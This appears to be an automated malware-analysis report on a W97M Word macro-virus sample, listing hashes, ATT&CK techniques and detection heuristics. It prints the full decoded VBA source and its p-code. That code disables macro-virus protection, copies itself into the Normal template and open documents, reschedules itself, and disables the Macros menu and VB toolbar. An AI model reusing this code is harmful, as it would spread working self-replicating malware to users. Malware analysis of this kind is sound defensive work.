W97M — Office (OLE) malware analysis

Static analysis result for SHA-256 030064818331d9b8…

MALICIOUS

Office (OLE)

31.5 KB Created: 2000-06-15 05:52:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-22
MD5: 44266a22135ec61aa9b3873f6badf890 SHA-1: d4eb2ce10eacec3134b4d02117e8d54bd2f456ad SHA-256: 030064818331d9b85ad91950a93e55adc63cf163cf9b48d51a51f55a6283b572
168 Risk Score

Malware Insights

W97M · confidence 90%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample is identified as a W97M variant, a family known for macro-based attacks. The AutoOpen macro attempts to disable macro protection and copy itself to the Normal template, indicating a persistence mechanism. This behavior is consistent with malware designed to spread and execute malicious code within the Office environment.

Heuristics 5

  • ClamAV: Win.Trojan.W97M-13 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.W97M-13
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "AutoOpen"
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11052 bytes
SHA-256: 06aefc9e7b5dcc22a8fb067028e7e5cc7c8d04a341f41fee7a8c887735bbd075
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"
Option Explicit

Public Sub MAIN()

Dim MyFile$
Dim OkExist
Dim TemplateName$
Dim internal
Dim xItem
Dim t
Dim s

'ÉèÖôíÎóÏÝÚå
On Error Resume Next

'»ñÈ¡»î¶¯ÎļþÃû
If ActiveDocument.Path = "" Then
  MyFile$ = ActiveDocument.Name
Else
  MyFile$ = ActiveDocument.Path + "\" + ActiveDocument.Name
End If

If MyFile$ = "" Then GoTo Bye

'Õûµã³öÏÖÈÕÆÚʱ¼äÐÅÏ¢
t = Format(Time, "hhmmss")
If Mid(t, 3, 2) = "00" And Not (Format(Date, "yyyy") = "1998" And Val(Format(Date, "mm")) < 9) Then
  MsgBox s, vbSystemModal, "CPSDI"
  'MsgBox Format(Date, "dddd,yyyy mmm dd") + "ÈÕ " + Format(Time, "hh") + "ʱ", vbSystemModal, "ÎÒµÄÌáÐÑ"
End If


' ÔÚͨÓÃÄ£°åÖвéÕÒÊÇ·ñÓÐAutoOpenºê
OkExist = 0
For Each xItem In NormalTemplate.VBProject.VBComponents
  If xItem.Type = 1 And xItem.Name = "AutoOpen" Then
    OkExist = 1
    Exit For
  End If
Next xItem

' »ñȡͨÓÃÄ£°åµÄÎļþÃû
TemplateName$ = NormalTemplate.Path + "\" + NormalTemplate.Name

'ÉèÖÃͨÓÃÄ£°åµÄÎļþÊôÐÔΪµµ°¸²¢½â³ýÆä²¡¶¾·À»¤¹¦ÄÜ
SetAttr TemplateName$, vbNormal
Options.VirusProtection = False

' ¿½±´AutoOpenºêµ½Í¨ÓÃÄ£°å
If OkExist <> 1 Then
    Application.OrganizerCopy Source:=MyFile$, Destination:=TemplateName$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
End If

' ÔڻÎĵµÖвéÕÒÊÇ·ñÓÐAutoOpenºê
OkExist = 0
For Each xItem In ActiveDocument.VBProject.VBComponents
  If xItem.Type = 1 And xItem.Name = "AutoOpen" Then
    OkExist = 1
    Exit For
  End If
Next xItem

'¿½±´AutoOpenºêµ½»î¶¯Îĵµ
If OkExist <> 1 Then
    Application.OrganizerCopy Source:=TemplateName$, Destination:=MyFile$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
End If

Bye:

' ÉèÖÃ×Ô¶¯ÔËÐÐAutoOpenºêµÄ¼ÆÊ±Æ÷
internal = "00:" + Str(10 - Val(Mid(t, 4, 1)))
Application.OnTime When:=Now + TimeValue(internal) - TimeValue("00:00:" + Right(t, 2)), Name:="AutoOpen", Tolerance:=60
DisableMacroMenu
DisableVBTools
End Sub
Public Sub DisableMacroMenu()
'ʹ¹¤¾ß²Ëµ¥ÖеĺêÃüÁî×éʧȥ×÷ÓÃ
Dim cb, xItem, xxItem, xxxItem
For Each cb In ActiveDocument.CommandBars
  If cb.Name = "Menu Bar" Then
    For Each xItem In cb.Controls
      If xItem.Caption = "¹¤¾ß(&T)" Then
        For Each xxItem In xItem.Controls
          If xxItem.Caption = "ºê(&M)" Then
            'xxItem.Enabled = True
            For Each xxxItem In xxItem.Controls
                xxxItem.Enabled = False
            Next xxxItem
            Exit Sub
          End If
        Next xxItem
      End If
    Next xItem
  End If
Next cb
End Sub
Public Sub DisableVBTools()
'ʹ¹¤¾ßÀ¸ÖеÄVisual Basicʧȥ×÷ÓÃ
Dim cb
For Each cb In ActiveDocument.CommandBars
  If cb.Name = "Visual Basic" Then
     cb.Enabled = False
     Exit For
  End If
Next cb
End Sub



' Processing file: /opt/analyzer/scan_staging/20de1762c7234ee2bc1897fc42b88c8a.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/AutoOpen - 5792 bytes
' Line #0:
' 	Option  (Explicit)
' Line #1:
' Line #2:
' 	FuncDefn (Public Sub MAIN())
' Line #3:
' Line #4:
' 	Dim 
' 	VarDefn MyFile
' Line #5:
' 	Dim 
' 	VarDefn OkExist
' Line #6:
' 	Dim 
' 	VarDefn TemplateName
' Line #7:
' 	Dim 
' 	VarDefn internal
' Line #8:
' 	Dim 
' 	VarDefn xItem
' Line #9:
' 	Dim 
' 	VarDefn t
' Line #10:
' 	Dim 
' 	VarDefn s
' Line #11:
' Line #12:
' 	QuoteRem 0x0000 0x000C "ÉèÖôíÎóÏÝÚå"
' Line #13:
' 	OnError (Resume Next) 
' Line #14:
' Line #15:
' 	QuoteRem 0x0000 0x000E "»ñÈ¡»î¶¯ÎļþÃû"
' Line #16:
' 	Ld ActiveDocument 
' 	MemLd Path 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #17:
' 	Ld ActiveDocument 
' 	MemLd New 
' 	St MyFile$ 
' Line #18:
' 	ElseBlock 
' Line #19:
' 	Ld ActiveDocument 
' 	MemLd Path 
' 	LitStr 0x0001 "\"
' 	Add 
' 	Ld ActiveDocument 
' 	MemLd New 
' 	Add 
' 	St MyFile$ 
' Line #20:
' 	EndIfBlock 
' Line #21:
' Line #22:
' 	Ld MyFile$ 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo Bye 
' 	EndIf 
' Line #23:
' Line #24:
' 	QuoteRem 0x0000 0x0014 "Õûµã³öÏÖÈÕÆÚʱ¼äÐÅÏ¢"
' Line #25:
' 	Ld Time 
' 	LitStr 0x0006 "hhmmss"
' 	ArgsLd Format$ 0x0002 
' 	St t 
' Line #26:
' 	Ld t 
' 	LitDI2 0x0003 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0003 
' 	LitStr 0x0002 "00"
' 	Eq 
' 	Ld Date 
' 	LitStr 0x0004 "yyyy"
' 	ArgsLd Format$ 0x0002 
' 	LitStr 0x0004 "1998"
' 	Eq 
' 	Ld Date 
' 	LitStr 0x0002 "mm"
' 	ArgsLd Format$ 0x0002 
' 	ArgsLd Val 0x0001 
' 	LitDI2 0x0009 
' 	Lt 
' 	And 
' 	Paren 
' 	Not 
' 	And 
' 	IfBlock 
' Line #27:
' 	Ld s 
' 	Ld vbSystemModal 
' 	LitStr 0x0005 "CPSDI"
' 	ArgsCall MsgBox 0x0003 
' Line #28:
' 	QuoteRem 0x0002 0x0066 "MsgBox Format(Date, "dddd,yyyy mmm dd") + "ÈÕ " + Format(Time, "hh") + "ʱ", vbSystemModal, "ÎÒµÄÌáÐÑ""
' Line #29:
' 	EndIfBlock 
' Line #30:
' Line #31:
' Line #32:
' 	QuoteRem 0x0000 0x0021 " ÔÚͨÓÃÄ£°åÖвéÕÒÊÇ·ñÓÐAutoOpenºê"
' Line #33:
' 	LitDI2 0x0000 
' 	St OkExist 
' Line #34:
' 	StartForVariable 
' 	Ld xItem 
' 	EndForVariable 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ForEach 
' Line #35:
' 	Ld xItem 
' 	MemLd TypeOf 
' 	LitDI2 0x0001 
' 	Eq 
' 	Ld xItem 
' 	MemLd New 
' 	LitStr 0x0008 "AutoOpen"
' 	Eq 
' 	And 
' 	IfBlock 
' Line #36:
' 	LitDI2 0x0001 
' 	St OkExist 
' Line #37:
' 	ExitFor 
' Line #38:
' 	EndIfBlock 
' Line #39:
' 	StartForVariable 
' 	Ld xItem 
' 	EndForVariable 
' 	NextVar 
' Line #40:
' Line #41:
' 	QuoteRem 0x0000 0x0015 " »ñȡͨÓÃÄ£°åµÄÎļþÃû"
' Line #42:
' 	Ld NormalTemplate 
' 	MemLd Path 
' 	LitStr 0x0001 "\"
' 	Add 
' 	Ld NormalTemplate 
' 	MemLd New 
' 	Add 
' 	St TemplateName$ 
' Line #43:
' Line #44:
' 	QuoteRem 0x0000 0x0030 "ÉèÖÃͨÓÃÄ£°åµÄÎļþÊôÐÔΪµµ°¸²¢½â³ýÆä²¡¶¾·À»¤¹¦ÄÜ"
' Line #45:
' 	Ld TemplateName$ 
' 	Ld vbNormal 
' 	ArgsCall SetAttr 0x0002 
' Line #46:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #47:
' Line #48:
' 	QuoteRem 0x0000 0x0019 " ¿½±´AutoOpenºêµ½Í¨ÓÃÄ£°å"
' Line #49:
' 	Ld OkExist 
' 	LitDI2 0x0001 
' 	Ne 
' 	IfBlock 
' Line #50:
' 	Ld MyFile$ 
' 	ParamNamed Source 
' 	Ld TemplateName$ 
' 	ParamNamed Destination 
' 	LitStr 0x0008 "AutoOpen"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #51:
' 	EndIfBlock 
' Line #52:
' Line #53:
' 	QuoteRem 0x0000 0x0021 " ÔڻÎĵµÖвéÕÒÊÇ·ñÓÐAutoOpenºê"
' Line #54:
' 	LitDI2 0x0000 
' 	St OkExist 
' Line #55:
' 	StartForVariable 
' 	Ld xItem 
' 	EndForVariable 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ForEach 
' Line #56:
' 	Ld xItem 
' 	MemLd TypeOf 
' 	LitDI2 0x0001 
' 	Eq 
' 	Ld xItem 
' 	MemLd New 
' 	LitStr 0x0008 "AutoOpen"
' 	Eq 
' 	And 
' 	IfBlock 
' Line #57:
' 	LitDI2 0x0001 
' 	St OkExist 
' Line #58:
' 	ExitFor 
' Line #59:
' 	EndIfBlock 
' Line #60:
' 	StartForVariable 
' 	Ld xItem 
' 	EndForVariable 
' 	NextVar 
' Line #61:
' Line #62:
' 	QuoteRem 0x0000 0x0018 "¿½±´AutoOpenºêµ½»î¶¯Îĵµ"
' Line #63:
' 	Ld OkExist 
' 	LitDI2 0x0001 
' 	Ne 
' 	IfBlock 
' Line #64:
' 	Ld TemplateName$ 
' 	ParamNamed Source 
' 	Ld MyFile$ 
' 	ParamNamed Destination 
' 	LitStr 0x0008 "AutoOpen"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #65:
' 	EndIfBlock 
' Line #66:
' Line #67:
' 	Label Bye 
' Line #68:
' Line #69:
' 	QuoteRem 0x0000 0x001F " ÉèÖÃ×Ô¶¯ÔËÐÐAutoOpenºêµÄ¼ÆÊ±Æ÷"
' Line #70:
' 	LitStr 0x0003 "00:"
' 	LitDI2 0x000A 
' 	Ld t 
' 	LitDI2 0x0004 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd Val 0x0001 
' 	Sub 
' 	ArgsLd Str 0x0001 
' 	Add 
' 	St internal 
' Line #71:
' 	Ld Now 
' 	Ld internal 
' 	ArgsLd TimeValue 0x0001 
' 	Add 
' 	LitStr 0x0006 "00:00:"
' 	Ld t 
' 	LitDI2 0x0002 
' 	ArgsLd Right 0x0002 
' 	Add 
' 	ArgsLd TimeValue 0x0001 
' 	Sub 
' 	ParamNamed When 
' 	LitStr 0x0008 "AutoOpen"
' 	ParamNamed New 
' 	LitDI2 0x003C 
' 	ParamNamed Tolerance 
' 	Ld Application 
' 	ArgsMemCall OnTime 0x0003 
' Line #72:
' 	ArgsCall DisableMacroMenu 0x0000 
' Line #73:
' 	ArgsCall DisableVBTools 0x0000 
' Line #74:
' 	EndSub 
' Line #75:
' 	FuncDefn (Public Sub DisableMacroMenu())
' Line #76:
' 	QuoteRem 0x0000 0x001E "ʹ¹¤¾ß²Ëµ¥ÖеĺêÃüÁî×éʧȥ×÷ÓÃ"
' Line #77:
' 	Dim 
' 	VarDefn cb
' 	VarDefn xItem
' 	VarDefn xxItem
' 	VarDefn xxxItem
' Line #78:
' 	StartForVariable 
' 	Ld cb 
' 	EndForVariable 
' 	Ld ActiveDocument 
' 	MemLd CommandBars 
' 	ForEach 
' Line #79:
' 	Ld cb 
' 	MemLd New 
' 	LitStr 0x0008 "Menu Bar"
' 	Eq 
' 	IfBlock 
' Line #80:
' 	StartForVariable 
' 	Ld xItem 
' 	EndForVariable 
' 	Ld cb 
' 	MemLd Controls 
' 	ForEach 
' Line #81:
' 	Ld xItem 
' 	MemLd Caption 
' 	LitStr 0x0008 "¹¤¾ß(&T)"
' 	Eq 
' 	IfBlock 
' Line #82:
' 	StartForVariable 
' 	Ld xxItem 
' 	EndForVariable 
' 	Ld xItem 
' 	MemLd Controls 
' 	ForEach 
' Line #83:
' 	Ld xxItem 
' 	MemLd Caption 
' 	LitStr 0x0006 "ºê(&M)"
' 	Eq 
' 	IfBlock 
' Line #84:
' 	QuoteRem 0x000C 0x0015 "xxItem.Enabled = True"
' Line #85:
' 	StartForVariable 
' 	Ld xxxItem 
' 	EndForVariable 
' 	Ld xxItem 
' 	MemLd Controls 
' 	ForEach 
' Line #86:
' 	LitVarSpecial (False)
' 	Ld xxxItem 
' 	MemSt Enabled 
' Line #87:
' 	StartForVariable 
' 	Ld xxxItem 
' 	EndForVariable 
' 	NextVar 
' Line #88:
' 	ExitSub 
' Line #89:
' 	EndIfBlock 
' Line #90:
' 	StartForVariable 
' 	Ld xxItem 
' 	EndForVariable 
' 	NextVar 
' Line #91:
' 	EndIfBlock 
' Line #92:
' 	StartForVariable 
' 	Ld xItem 
' 	EndForVariable 
' 	NextVar 
' Line #93:
' 	EndIfBlock 
' Line #94:
' 	StartForVariable 
' 	Ld cb 
' 	EndForVariable 
' 	NextVar 
' Line #95:
' 	EndSub 
' Line #96:
' 	FuncDefn (Public Sub DisableVBTools())
' Line #97:
' 	QuoteRem 0x0000 0x0020 "ʹ¹¤¾ßÀ¸ÖеÄVisual Basicʧȥ×÷ÓÃ"
' Line #98:
' 	Dim 
' 	VarDefn cb
' Line #99:
' 	StartForVariable 
' 	Ld cb 
' 	EndForVariable 
' 	Ld ActiveDocument 
' 	MemLd CommandBars 
' 	ForEach 
' Line #100:
' 	Ld cb 
' 	MemLd New 
' 	LitStr 0x000C "Visual Basic"
' 	Eq 
' 	IfBlock 
' Line #101:
' 	LitVarSpecial (False)
' 	Ld cb 
' 	MemSt Enabled 
' Line #102:
' 	ExitFor 
' Line #103:
' 	EndIfBlock 
' Line #104:
' 	StartForVariable 
' 	Ld cb 
' 	EndForVariable 
' 	NextVar 
' Line #105:
' 	EndSub 
' Line #106:
' Line #107: